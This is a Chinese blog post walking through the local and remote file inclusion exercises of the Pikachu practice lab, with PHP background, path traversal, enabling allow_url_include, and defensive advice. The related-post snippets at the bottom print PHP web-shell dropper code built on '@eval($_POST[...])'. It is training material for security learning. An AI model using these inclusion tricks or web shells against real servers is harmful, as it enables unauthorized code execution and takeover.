pikachu之file include

最新推荐文章于 2024-06-18 17:47:02 发布
最新推荐文章于 2024-06-18 17:47:02 发布
阅读量272 收藏
点赞数
分类专栏: 网络空间安全 文章标签: 前端 安全 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_38720471/article/details/122669416
版权

1概述

File Inclusion(文件包含漏洞)概述文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了:
include(),include_once()
require(),require_once()
这些文件包含函数,这些函数在代码设计中被经常使用到。
大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。 但是,有些时候,文件包含的代码文件被写成了一个变量,且这个变量可以由前端用户传进来,这种情况下,如果没有做足够的安全考虑,则可能会引发文件包含漏洞。 攻击着会指定一个“意想不到”的文件让包含函数去执行,从而造成恶意操作。 根据不同的配置环境,文件包含漏洞分为如下两种情况:
1.本地文件包含漏洞:仅能够对服务器本地的文件进行包含,由于服务器上的文件并不是攻击者所能够控制的,因此该情况下,攻击着更多的会包含一些 固定的系统配置文件,从而读取系统敏感信息。很多时候本地文件包含漏洞会结合一些特殊的文件上传漏洞,从而形成更大的威力。
2.远程文件包含漏洞:能够通过url地址对远程的文件进行包含,这意味着攻击者可以传入任意的代码,这种情况没啥好说的,准备挂彩。
因此,在web应用系统的功能设计上尽量不要让前端用户直接传变量给包含函数,如果非要这么做,也一定要做严格的白名单策略进行过滤

2file include(local)

2.1
在这里插入图片描述
发现从前端传入了filename

2.2
在这里插入图片描述

输入一个错误文件名,爆出文件路径

2.3
指定一个新的filename 成功回显了1.txt中的信息
在这里插入图片描述
在这里插入图片描述
其中…/表示返回按上级目录

3file inclusion(remote)

3.1
更改php.ini文件

vim /etc/php/7.4/apache2/php.ini

allow_url_include=off 改成on
3.2
在这里插入图片描述
filename的地址直接改为url地址 ,成功回显。

4防护方案

4.1文件操作不放前端。一定要在前端操作,那就要过滤各种例如…/…/,http://,https://等危险字符
4.2通过白名单策略,仅允许包含运行指定的文件,其他的都禁止(白名单策略)。
4.3尽量不用动态包含。

逆流!
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pikachu通关教程(File include)
Bu2n的博客
12-11 468
文件包含本地文件包含远程文件包含 本地文件包含 随便选一个选项,可以看到url提交的参数存在文件名 随便输入值,还会爆出当前路径 源码 $html=''; if(isset($_GET['submit']) && $_GET['filename']!=null){ $filename=$_GET['filename']; include "include/$filename";//变量传进来直接包含,没做任何的安全限制 // //安全的写法,使用白名单,严格指定包
pikachu LINUX安装包,
07-14
上传到根目录,解压直接就问访问,里面有教程
Pikachu-File Inclusion
baynk的博客
11-19 798
0x00 File Inclusion(文件包含漏洞)概述 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了: include(),include_once() require(),require_once() 这些文件包含函数,这些函数在代码设计中被经常使用到。 大多数情况下,文件包含函...
pikachu之文件包含漏洞
weixin_51446936的博客
06-09 2147
一、文件包含漏洞概述 在web后台开发中,程序员往往为了提高效率以及让代码看起来更简洁,会使用“包含”函数功能。比如把一系列功能函数都写进function.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句<?php include function.php?>就可以调用函数代码 但有些时候,因为网站功能需求,会让前端用户选择需要包含的文件(或者在前端的功能中使用了“包含”功能),又由于开发人员没有对要包含的这个文件进行安全考虑,就导致攻击者可以通过修改包含文件的位置来让后台执行任意
pikachu-文件包含
baidu_39504221的博客
11-21 230
文章目录0x01 本地文件包含0x02 远程文件包含 0x01 本地文件包含 在根目录D:\phpstudy_pro\WWW\pikachu\vul\sqli下创建一个1.txt,再尝试包含一下 0x02 远程文件包含 将自己服务器上的文件下载到被害人的服务器上就是远程文件包含 1)在自己的服务器上写一个攻击脚本1.txt <?php $myfile = fopen("1.php", "w"); $txt = '<?php @eval($_POST["test"]);?&g
pikachu-master
05-04
Pikachu漏洞测试平台搭建详解》 在网络安全领域,漏洞测试是确保系统安全的重要环节。Pikachu,一个以小精灵命名的漏洞测试平台,因其易用性和实用性,成为了许多安全研究人员和初学者的首选工具。本文将详细介绍...
pikachu-master.zip
06-25
Pikachu靶场:全面理解与提升网络安全技能》 "Pikachu-master.zip"这个压缩包文件,无疑为我们提供了一个宝贵的网络安全学习资源——Pikachu靶场。靶场,是网络安全领域中的一个重要概念,它模拟真实网络环境,让...
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
pikachu靶场通关
11-19
pikachu靶场通关
pikachu之文件包含
weixin_44940180的博客
08-15 1158
一、本地文件包含 可以查看本地文件 或者可以和文件上传一起getshell 具体过程可以看pikachu之文件上传实验 二、远程文件包含 攻击者本地有一个名为77.php的文件 通过远程文件包含获得getshell 然后使用菜刀连接 ...
PIKACHU文件包含
qq_62078839的博客
04-11 1422
原理 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接)。 PHP中文件包含函数有以下四种: require() require_once() include() include_once() 本地文件包含 我们再pikachu
pikachu笔记之文件包含
weixin_53255260的博客
07-29 1271
一、概述 在web后台开发中,程序员往往为了提高效率以及让代码看起来更加简洁,会使用“包含”函数功能。比如把一系列功能函数写进fuction.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句<?oho include fuction.php?>就可以调用函数代码。 但有些时候,因为网站的功能需求,会让前端用户选择需要包含的文件或者在前端的功能中使用了“包含”功能。又由于开发人员没有对要包含的这个文件进行安全考虑,就导致攻击者可以通过修改包含文件的位置...
Pikachu系列——文件包含
Zlirving_的博客
05-18 813
Pikachu靶场系列持续更新~   要像追剧追番一样追下去哦   实验六 —— 文件包含 文件包含概述 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了: include( ) 当使用该函数包含文件时,只有代码执行到 include()函数时才将文件包含 进来,发生错误时之给出一个警告,继续向下执行。 include_once( ) 功能与 Include()相同,区别在于当重
Pikachu靶场--文件包含
最新发布
qq_65150735的博客
06-18 1075
Pikachu靶场--文件包含
pikachu--- file include
weixin_50339832的博客
06-16 283
文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了: include(),include_once() require(),require_once() 这些文件包含函数,这些函数在代码设计中被经常使用到。 大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。 但是,有些时候,文件包含的代码文件被写成了一个变量,且这个变量可以由前端用户传进来,这种情况下,如果没有...
pikachuFile Inclusion
Alsn86的博客
12-10 1756
pikachuFile Inclusion 准备好一段创建一句话木马的php代码,后缀改为jpg <?php $mima="'".'ma'."'"; touch ("testshell.php"); $file = fopen("testshell.php","w"); $write='<?php @eval($_POST['.$mima.']); ?>'; echo fwrite($file,$write); fclose($file); echo "已经创建一句话php文件";
四、pikachu之文件包含
qq_55202378的博客
08-23 1015
文件包含
五、pikachu 文件包含
山兔的博客
09-17 571
1.File Inclusion(文件包含漏洞)概述 1.本地文件包含漏洞:仅能够对服务器本地的文件进行包含 2.远程文件包含漏洞:能够通过url地址对远程的文件进行包含 处理: 在web应用系统的功能设计上尽量不要让前端用户直接传变量给包含函数,如果非要这么做,也一定要做严格的白名单策略进行过滤。 2.本地文件包含 先随便点一个提交,可以看到url中的filename估计就是包含文件,我们修改下 http://192.168.248.132/pikachu/vul/fileinclude/ fi_loca
pikachu靶场之CSRF
10-03
pikachu靶场中的CSRF(Cross-Site Request Forgery)是一种常见的Web安全漏洞,它允许攻击者利用受信任用户的身份执行未经授权的操作。CSRF攻击发生在用户在一个网站上登录之后,在没有退出该网站的情况下,访问另一个恶意网站时触发。 具体来说,在pikachu靶场中,CSRF攻击主要发生在GET请求中。攻击者可通过构造特定的URL,诱使用户点击,从而执行恶意操作。在登录过程中,pikachu靶场中有多个账号可供使用,如vince、allen、kobe、grady、kevin、lucy和lili,密码均为123456。 与XSS(Cross-Site Scripting)攻击相比,CSRF攻击的利用条件更为复杂,因此CSRF的安全级别相对较低。 为了防止CSRF攻击,pikachu靶场采取了一些防护措施,如使用CSRF Token来验证请求的合法性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值